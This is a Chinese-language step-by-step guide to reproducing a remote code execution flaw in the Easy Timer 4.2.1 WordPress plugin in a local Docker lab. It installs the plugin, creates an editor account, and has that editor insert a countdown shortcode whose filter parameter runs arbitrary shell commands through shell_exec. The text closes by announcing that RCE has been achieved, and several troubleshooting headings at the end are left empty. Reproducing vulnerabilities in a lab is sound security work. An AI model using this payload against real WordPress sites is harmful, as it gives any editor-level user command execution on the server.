请参阅官方 Docker 文档进行安装:Docker Engine 安装
在您的项目目录中执行:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/WordPress 仪表盘 → 插件 → Easy Timer,然后点击 启用。
在您的项目目录中执行以下命令:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(注意:请替换为您自己选择的用户名、邮箱和密码!)
文章 → 写文章短代码块,并输入:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ 注意:请确保您使用的是 短代码块,而不是段落块,以便短代码能够正确渲染。
恭喜,您已获得 RCE。

sudo docker ps
您应该会看到类似以下内容:
如果短代码 未渲染:
如果访问 http://localhost:8000/ 时提示 数据库未连接: